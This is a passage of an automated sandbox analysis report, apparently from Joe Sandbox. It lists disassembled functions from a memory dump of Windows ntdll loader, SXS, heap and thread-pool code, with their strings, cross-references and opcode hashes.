                                                                                  Strings
                                                                                  • LdrpInitShimEngine, xrefs: 00F999F4, 00F99A07, 00F99A30
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00F99A11, 00F99A3A
                                                                                  • apphelp.dll, xrefs: 00F36496
                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00F99A01
                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00F99A2A
                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00F999ED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-204845295
                                                                                  • Opcode ID: 6da634ccf37575eee5d3ae296292c5144623c9b58cdf4b1230bdbce180736850
                                                                                  • Instruction ID: a1c26a7fdf087e4b6e52d2b0d6ca198cdc2fd9a53050fcbab1561c32b519c5c1
                                                                                  • Opcode Fuzzy Hash: 6da634ccf37575eee5d3ae296292c5144623c9b58cdf4b1230bdbce180736850
                                                                                  • Instruction Fuzzy Hash: 5351D171608300ABE720DF24DC82BAB77E8FB84754F00491DF5859B1A1D778E904EB92
                                                                                  Function 00F7C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpInitializeProcess, xrefs: 00F7C6C4
                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 00FB81E5
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00F7C6C3
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 00FB8181, 00FB81F5
                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 00FB8170
                                                                                  • LdrpInitializeImportRedirection, xrefs: 00FB8177, 00FB81EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-475462383
                                                                                  • Opcode ID: e35f35d2a19e9c892a9870687dd30286ce70cdcd741e4b5e152ed20d47640c44
                                                                                  • Instruction ID: fe06095576291c647f9192054226eacc5d406c6bbd1c7a90b2a5b61877e71f76
                                                                                  • Opcode Fuzzy Hash: e35f35d2a19e9c892a9870687dd30286ce70cdcd741e4b5e152ed20d47640c44
                                                                                  • Instruction Fuzzy Hash: 4A310B716443159FC220EF68DD87E5A7798FFC5B10F04452CF8889B291DA28DD05EBA3
                                                                                  Function 00F72674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 00FB2160, 00FB219A, 00FB21BA
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00FB21BF
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00FB2178
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 00FB2165
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00FB2180
                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00FB219F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                  • API String ID: 0-861424205
                                                                                  • Opcode ID: ca9a892f491cb0b2b6cad727e4e41787acabee67e789ff12a29b41e7bf0d19f4
                                                                                  • Instruction ID: 87fa217a3a256f02c76dee81986bf3ef1dd9201d0e48017de2e7286123808e43
                                                                                  • Opcode Fuzzy Hash: ca9a892f491cb0b2b6cad727e4e41787acabee67e789ff12a29b41e7bf0d19f4
                                                                                  • Instruction Fuzzy Hash: AF315C36F0032177E7219A598C86FDFB778DB54B50F15405ABA0877241D270DE01FBA2
                                                                                  Function 00F8096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00F82DF0: LdrInitializeThunk.NTDLL ref: 00F82DFA
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80BA3
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80BB6
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80D60
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80D74
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 1404860816-0
                                                                                  • Opcode ID: 8f550626082fd000e19d6cd748258ca2265d86769ca46ff813b20e73e6a71695
                                                                                  • Instruction ID: a6000922a38e5ec15ba7a29d783e079ebd3cb490cb49413de746b191b76c10e3
                                                                                  • Opcode Fuzzy Hash: 8f550626082fd000e19d6cd748258ca2265d86769ca46ff813b20e73e6a71695
                                                                                  • Instruction Fuzzy Hash: 7C426B72900715DFDB60DF64C881BEAB7F4BF04310F1485A9E999EB241EB74AA84DF60
                                                                                  Function 00F4A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                  • API String ID: 0-379654539
                                                                                  • Opcode ID: e8fe3d71ef1451c8713fdbcdae6aef298800eb820af5bb1a523819cafb880baf
                                                                                  • Instruction ID: 5c4cdf5ddfef660705167e3d1c4d62905b61aa86798af2dbe0e160808eb7c9cb
                                                                                  • Opcode Fuzzy Hash: e8fe3d71ef1451c8713fdbcdae6aef298800eb820af5bb1a523819cafb880baf
                                                                                  • Instruction Fuzzy Hash: E6C19BB56483828FD711CF18C540B6ABBE4FF85714F04486AFC958B261E778CA49EB53
                                                                                  Function 00F78402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpInitializeProcess, xrefs: 00F78422
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00F78421
                                                                                  • @, xrefs: 00F78591
                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F7855E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1918872054
                                                                                  • Opcode ID: a64daf1557ed5163904d5f96cc728f15f3727562dd028caa4420d15aa396eb49
                                                                                  • Instruction ID: e162fc613903edb2f025227b4825d6658bdb6a7596497005389b2b654d1b66e3
                                                                                  • Opcode Fuzzy Hash: a64daf1557ed5163904d5f96cc728f15f3727562dd028caa4420d15aa396eb49
                                                                                  • Instruction Fuzzy Hash: BB91BD71548340AFD721EE21CC45FABBBECBF84794F44492EFA8892041E738D945AB63
                                                                                  Function 00F7273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00FB22B6
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 00FB21DE
                                                                                  • .Local, xrefs: 00F728D8
                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00FB21D9, 00FB22B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                  • API String ID: 0-1239276146
                                                                                  • Opcode ID: ed1ecf6015cdba9535cff81c6a8f08aabca43e1882387a57b5fcd56da1f01254
                                                                                  • Instruction ID: eed8a7fd440a778388e68070f0b134abdca37a1af9f89ffa9298c99ab1e922d9
                                                                                  • Opcode Fuzzy Hash: ed1ecf6015cdba9535cff81c6a8f08aabca43e1882387a57b5fcd56da1f01254
                                                                                  • Instruction Fuzzy Hash: E1A1B232D00229DBDB64CF55DC84BE9B3B5BF58324F2441EAD908A7251D7309E81EF92
                                                                                  Function 00F74AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RtlDeactivateActivationContext, xrefs: 00FB3425, 00FB3432, 00FB3451
                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00FB3456
                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 00FB342A
                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00FB3437
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                  • API String ID: 0-1245972979
                                                                                  • Opcode ID: 8ec06cbaf3ceefb47b71f8b80b9587223c4171c28552fade45dea1604912b1b9
                                                                                  • Instruction ID: 253f6b8e65fcedda8825eaf6a59f2ccc8b36339b547835f74980c05cd69ad848
                                                                                  • Opcode Fuzzy Hash: 8ec06cbaf3ceefb47b71f8b80b9587223c4171c28552fade45dea1604912b1b9
                                                                                  • Instruction Fuzzy Hash: F1612A32A44B11DFC722CF19C842B66B7E5EF80B60F15852AF8599B281D734FD01EB92
                                                                                  Function 00F464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FA10AE
                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FA0FE5
                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FA1028
                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FA106B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                  • API String ID: 0-1468400865
                                                                                  • Opcode ID: c4a87a7ce2b9f86dfe0071a88e479d4216e037a016b19da629d4f8b6738e7bc0
                                                                                  • Instruction ID: 3157dcaa84d1958e8d0417b1ddf4363efb8072917cc06c6c46ad6d9420f1029e
                                                                                  • Opcode Fuzzy Hash: c4a87a7ce2b9f86dfe0071a88e479d4216e037a016b19da629d4f8b6738e7bc0
                                                                                  • Instruction Fuzzy Hash: BF71BEB19043049FCB20EF14C885B9B7FA8AF96764F140468FD498B286D739D589EBD2
                                                                                  Function 00F6245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FAA9A2
                                                                                  • apphelp.dll, xrefs: 00F62462
                                                                                  • LdrpDynamicShimModule, xrefs: 00FAA998
                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FAA992
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-176724104
                                                                                  • Opcode ID: 47aa9eb3d94f28141bd8e90dba8c96ffc44e26cd6337058ccf73e1cace887619
                                                                                  • Instruction ID: 6ebdbf637fc366511db8274f41abff015b28ca286e3bcec09f889f0e736c38d8
                                                                                  • Opcode Fuzzy Hash: 47aa9eb3d94f28141bd8e90dba8c96ffc44e26cd6337058ccf73e1cace887619
                                                                                  • Instruction Fuzzy Hash: 71315BB2A00201EBDB30DF59DC85A6A77B8FB89724F154019F8416F245C77D9D45E741
                                                                                  Function 00F529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • HEAP[%wZ]: , xrefs: 00F53255
                                                                                  • HEAP: , xrefs: 00F53264
                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00F5327D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                  • API String ID: 0-617086771
                                                                                  • Opcode ID: 5efe591b216b2969d8e394107bcdac7a78dd11b8f59181a627a151d877ec8d1f
                                                                                  • Instruction ID: 4455e36199ce4a1247b6a34a6780cc835a12e6d2bd3ccab0c9dedf420879ef35
                                                                                  • Opcode Fuzzy Hash: 5efe591b216b2969d8e394107bcdac7a78dd11b8f59181a627a151d877ec8d1f
                                                                                  • Instruction Fuzzy Hash: B592EE71E042489FDB25CF68C440BADBBF1FF49311F188159E949AB392D738AA49EF50
                                                                                  Function 00F50770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-4253913091
                                                                                  • Opcode ID: 8595608e587ce5e22a10a6eefd587d2deb6822b8b09dbd63fc2b0b1d6553dee5
                                                                                  • Instruction ID: 800173e3050fc6e25cb7b58a0575150f2016bc747bfc322dfac3f5fe61f7cc95
                                                                                  • Opcode Fuzzy Hash: 8595608e587ce5e22a10a6eefd587d2deb6822b8b09dbd63fc2b0b1d6553dee5
                                                                                  • Instruction Fuzzy Hash: 47F1BB71A00A05DFDB25CF68C880B6AB7F5FF45711F248168E9069B382DB34ED85EB90
                                                                                  Function 00F66962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $@
                                                                                  • API String ID: 0-1077428164
                                                                                  • Opcode ID: bf4a1f0dbfbdc08c08b240851bc3d16225fb0a556ab4a17977de4feb41752f7d
                                                                                  • Instruction ID: 38d2cfdc7d3ba0c7368d4822b724bc33b3f46a9171943a24cd14cea335d54336
                                                                                  • Opcode Fuzzy Hash: bf4a1f0dbfbdc08c08b240851bc3d16225fb0a556ab4a17977de4feb41752f7d
                                                                                  • Instruction Fuzzy Hash: 40C28072A0C3419FDB25CF24C881BABBBE5AF89754F14892DF989C7241D734D805EB92
                                                                                  Function 00F3A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                  • API String ID: 0-2779062949
                                                                                  • Opcode ID: b180c1637dd56cc2303459c1da5eb2ecdc8e249765dae2bde453e5a4a47ec4e1
                                                                                  • Instruction ID: 7f1c415a28137af3d927f80f4803e2c29cbd0e4f77f09b3f33aa18da686b1ad3
                                                                                  • Opcode Fuzzy Hash: b180c1637dd56cc2303459c1da5eb2ecdc8e249765dae2bde453e5a4a47ec4e1
                                                                                  • Instruction Fuzzy Hash: F6A15A71D016299BDF21DB64CC89BEAB7B8EF48710F1041E9E908A7250D7359E84DF90
                                                                                  Function 00F60BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpCheckModule, xrefs: 00FAA117
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FAA121
                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 00FAA10F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-161242083
                                                                                  • Opcode ID: 7ca0f0f13f6c141861a092ab7218681e4ee8ce47330fcafc1c8ba36242c1bb4b
                                                                                  • Instruction ID: 5c075d946e21bb912a752eecae1f1048f026cc6799d8b9568bef6cde6e8e1d5f
                                                                                  • Opcode Fuzzy Hash: 7ca0f0f13f6c141861a092ab7218681e4ee8ce47330fcafc1c8ba36242c1bb4b
                                                                                  • Instruction Fuzzy Hash: FC71D1B1E00205AFCB24DF68CD81AAEB7F4FB44714F244529E8429B251DB39AE45EB51
                                                                                  Function 00F50A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-1334570610
                                                                                  • Opcode ID: 33eb201e655602755f09ff1f5eb04d7527faad4a160ace0ec88078829aa24868
                                                                                  • Instruction ID: 7ea77bb0531c219f5404f834223e058391dc7897640b8d88b9a01147d8a52d04
                                                                                  • Opcode Fuzzy Hash: 33eb201e655602755f09ff1f5eb04d7527faad4a160ace0ec88078829aa24868
                                                                                  • Instruction Fuzzy Hash: EB610571A00701EFDB28CF24C481B6ABBE2FF85715F148559E985CF282DB74E885EB91
                                                                                  Function 00F7C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 00FB82DE
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FB82E8
                                                                                  • Failed to reallocate the system dirs string !, xrefs: 00FB82D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1783798831
                                                                                  • Opcode ID: 4c873b3b8e682f4d50f1c8247586a3340da43293dc2cf150c4bd937b9fe6b315
                                                                                  • Instruction ID: 08654d7418c462067a379ec21c51dcfaaa4e462c047ccab07662f73d0620c823
                                                                                  • Opcode Fuzzy Hash: 4c873b3b8e682f4d50f1c8247586a3340da43293dc2cf150c4bd937b9fe6b315
                                                                                  • Instruction Fuzzy Hash: FB410571544300ABC734EB24DC42B5B77ECAF49760F04492EF988D7291EB79D801EB92
                                                                                  Function 00FFC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • PreferredUILanguages, xrefs: 00FFC212
                                                                                  • @, xrefs: 00FFC1F1
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 00FFC1C5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                  • API String ID: 0-2968386058
                                                                                  • Opcode ID: c96ffec081b8329b1364381722294e5bd54c0ca6bb53301fb3f7551c708c7644
                                                                                  • Instruction ID: b1be994d75cfe4ca58062476d315d55f5f3af7d815ccca3f3d9f63d3d131865e
                                                                                  • Opcode Fuzzy Hash: c96ffec081b8329b1364381722294e5bd54c0ca6bb53301fb3f7551c708c7644
                                                                                  • Instruction Fuzzy Hash: 17416D72E0022DABDB11DAD4CD91BEEB7B8EF54710F14406AEA05B72A0D7749E44AB90
                                                                                  Function 00FD4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                  • API String ID: 0-1373925480
                                                                                  • Opcode ID: 695b3326841947a0f70dc239aec6c329fd2bc6e51842ecf5e70680783b5a1430
                                                                                  • Instruction ID: df40438abec0425b524ace0e10cde953ade63d2a33d9ca3d34b66fa352b2e641
                                                                                  • Opcode Fuzzy Hash: 695b3326841947a0f70dc239aec6c329fd2bc6e51842ecf5e70680783b5a1430
                                                                                  • Instruction Fuzzy Hash: 22411532D043588BEB22DBE5CC45BADB7B6FF45350F28045AE901EB782D738A945EB10
                                                                                  Function 00FC4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 00FC4899
                                                                                  • LdrpCheckRedirection, xrefs: 00FC488F
                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00FC4888
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-3154609507
                                                                                  • Opcode ID: d880ec8cc2ec5ec53490cd0ddc812a93057b87cad737fb8490dc50354f71f319
                                                                                  • Instruction ID: cbef9851d8f1d76b444bda1d4ee9bb888a2885f860e00eea7b1b05183f1061f7
                                                                                  • Opcode Fuzzy Hash: d880ec8cc2ec5ec53490cd0ddc812a93057b87cad737fb8490dc50354f71f319
                                                                                  • Instruction Fuzzy Hash: 3241B032A042529FCB21CE58DA62F667BE8BF89760F05065DEC98D7291D731FC00EB91
                                                                                  Function 00F50BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-2558761708
                                                                                  • Opcode ID: e22f5ac160cb67bee1c8eee990540a54b59397d9eaafe6c78b07a7dc88853f6b
                                                                                  • Instruction ID: 0f40753e2255b726c6c8edbb427fadd550775f6a41329c2a7690888b957ddffb
                                                                                  • Opcode Fuzzy Hash: e22f5ac160cb67bee1c8eee990540a54b59397d9eaafe6c78b07a7dc88853f6b
                                                                                  • Instruction Fuzzy Hash: 2C11E472315941EFD728C614C8A2B79B3A4EF85B26F258119ED06CF251DB34EC84F751
                                                                                  Function 00FC20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 00FC20F3
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FC2104
                                                                                  • LdrpInitializationFailure, xrefs: 00FC20FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
